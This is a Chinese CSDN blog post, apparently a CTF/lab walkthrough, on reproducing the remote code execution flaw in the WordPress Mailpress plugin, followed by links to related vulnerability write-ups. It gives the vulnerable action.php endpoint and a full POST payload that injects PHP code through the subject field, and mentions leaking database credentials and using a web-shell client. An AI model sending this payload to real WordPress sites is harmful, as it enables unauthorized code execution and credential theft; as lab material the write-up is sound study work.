2022信安冬令营day1——WordPress-Mailpress远程代码执行漏洞

最新推荐文章于 2024-03-19 09:31:22 发布
最新推荐文章于 2024-03-19 09:31:22 发布
阅读量2.5k 收藏 3
点赞数 1
文章标签: 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_54628962/article/details/122911765
版权
本文详细介绍了如何复现WordPress中Mailpress插件的远程代码执行漏洞。通过wpscan扫描发现漏洞,使用Hackbar插件在火狐浏览器中构造POST请求,逐步执行恶意代码,获取服务器敏感信息,包括数据库用户名和密码,并利用蚁剑进行进一步操作,最终找到并展示了所有flag。
摘要由CSDN通过智能技术生成

wordpress

在这里插入图片描述
由IP地址进入网页
在这里插入图片描述
利用wpscan软件扫描该IP地址发现漏洞为Mailpress插件远程代码执行漏洞

Mailpress插件远程代码执行漏洞复现

利用火狐中hackbar插件

  1. F12进入 web控制台,把URL写入hackbar中,选中Post data键,传入post值,运行
    URL:
    http://IP地址:端口/wp-content/plugins/mailpress/mp-includes/action.php
    POST:action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php phpinfo();?>&html=&plaintext=&mail_format=standard&autosave=1

最低0.47元/天 解锁文章
柒七-l
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现】CVE-2024-4577|PHP CGI Windows平台远程代码执行漏洞
信安百科
06-09 1442
漏洞复现】CVE-2024-4577|PHP CGI Windows平台远程代码执行漏洞
WordPress-Mailpress远程代码执行漏洞
冷冷的oO
02-16 3304
在kali中使用火狐浏览器打开靶场192.168.7.200,看到题目。 访问题目给出的网址192.168.7.100。 在终端中使用WPScan扫描网址: 输入命令wpscan --url IP 然后扫描结果中显示Interesting Findings,仔细观察。 在这里我们主要对mailpress rce漏洞进行复现,找到flag。 步骤: 1.安装HackBar插件,浏览器右上角菜单-首选项-左下角扩展与主题-搜索,按F12/Fn+F12可使用插件. 2.调出插件,输入URL和要提交的数据
WordPress-Mailpress插件远程代码执行漏洞
Jim的博客
09-07 1016
漏洞利用:subject=
WordPress-Mailpress远程代码执行漏洞——利用
zjnuwsf的博客
05-12 4420
相关资料: http://www.jeeseen.com/archives/421.html http://www.xingkonglangzi.com/post-662.html https://www.exehack.net/3509.html https://github.com/Medicean/VulApps/tree/master/w/wordpress/2
WordPress插件Mailpress高危远程命令执行漏洞
10-08 393
漏洞描述: Mailpress是一个比较流行的WordPress邮件插件,由于存在越权调用,在不登陆的情况下,可以调用系统某些方法,造成远程命令执行。 影响版本:所有版本,当前最新版本5.4.3 漏洞等级:高危 修复建议: 1、建议停用此插件。 2、添加网站至云观测,及时了解网站组件突发/0day漏洞。(来源:东方联盟郭盛华博客) ...
php wordpress漏洞,wordpress 4.6远程代码执行漏洞环境搭建
weixin_39942033的博客
03-25 313
这篇文章主要是记录下搭建漏洞测试环境的过程,然而从中午开始,断断续续的一直折腾到凌晨,只是搭建了成功了本地能复现的环境,并没有实现远程复现。究其原因,主要是固执到一直想用daocloud来搭建测试环境,坑好多,花了太多时间来填坑了,记录下过程。docker pull wordpress:4.6-php5.6-apachedocker pull daocloud.io/library/mysql:5...
VMware vCenter Server远程代码执行漏洞复现 CVE-2021-21972
Ms08067安全实验室
08-18 1万+
文章来源|MS08067安全实验室本文作者:Taoing(WEB高级攻防班讲师)0x00 漏洞描述CVE-2021-21972 vmware vcenter的一个未任意位置,然后执行web...
0day-未公开漏洞-wordpress wholesale market 文件读取漏洞
最新发布
weixin_43167326的博客
03-19 644
WordPress plugin Wholesale Market 是一个woocommerce扩展插件,使您的商店能够创建批发用户,并通过设置产品的批发价格。wordpress wholesale market 存在文件读取漏洞
天权信安杯 catf1ag CTF 2022 题目
12-09
天权信安杯 catf1ag CTF 2022 题目。除了Web,其他类型的题目基本上都下载了。
WordPress-Mailpress远程代码执行漏洞复现
Ping_Pig的博客
11-04 1888
插件简介: Mailpress是一个比较流行的邮件插件。 插件下载Plugin Directory:https://wordpress.org/plugins/mailpress/ 漏洞复现: 漏洞详解地址:https://github.com/Medicean/VulApps/tree/master/w/wordpress/2 Docker镜像地址: docker pull m...
php wordpress漏洞,WordPress 4.6无需认证远程命令执行漏洞分析
weixin_31069599的博客
03-25 816
WordPress是一个注重美学、易用性和网络标准的个人信息发布平台。使用WordPress可以搭建功能强大的网络信息发布平台,但更多的是应用于个性化的博客。根据w3techs.com对WordPress网站的实时市场份额统计,WordPress占所有使用内容管理系统的网站的58.9%。大约占所有网站的27.9%左右。WordPress 4.6 版本存在一个非常严重的远程代码执行漏洞,未经授权的攻...
wordpress plugin 拦截题目和内容
gedoua的博客
04-26 171
[code="java"] [/code]
wordpress远程图片本地化插件
老K的博客
12-29 3650
其实有很多插件是可以实现wordpress远程图片本地化的,例如auto_save_image就比较不错。不过如果你是代码控,不喜欢用插件,那么下面这段“wordpress远程图片自动本地化“的代码也许适合你。 把下面代码加入主题的functions.php文件即可。 add_filter('content_save_pre', 'auto_save_image'); function au
WordPress--mailpress RCE复现
ro4lsc的博客
03-16 7867
本文主要讲述了WordPress--mailpress RCE漏洞的复现,如有纰漏,请联系笔者修改,希望能对您有所帮助。
thinkphp远程代码执行漏洞
热门推荐
玄道的网安博客
12-11 1万+
0x00前言 近日thinkphp团队发布了版本更新https://blog.thinkphp.cn/869075,其中修复了一处getshell漏洞。 影响范围:5.x &lt; 5.1.31, &lt;= 5.0.23 危害:远程代码执行 0x01漏洞原理 首先我们来看url http://localhost/public/index.php?s=index/\think\Cont...
记一次Mailpress插件RCE漏洞复现
qq_42562304的博客
07-26 442
WordPressMailpressPlugin插件中,文件中iview()函数中subject参数未经过滤,直接拼接do_eval函数执行代码,而do_eval函数也未经任何过滤,导致远程代码执行漏洞。详情链接。
mailchimp for wordpress
qq_29465867的博客
12-13 1367
wordpress使用mailchimp添加订阅,首先将注册好的api key登陆,然后设计form,form通过appearce,wdget放到合适位置,添加订阅后,再后台list中可以看到相应订阅者 发送邮件,从campaign发送可以选择list群发
中国矿大信安专业:信息系统安全期末复习要点-漏洞修复与安全管理
1. **信息系统的安全属性**: - 机密性:确保信息仅被授权人员访问,防止未经授权的泄露。 - 完整性:保护数据不被篡改,防止未经授权的修改。 - 可用性:确保系统和数据在需要时能正常运行,不受恶意干扰。 - ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值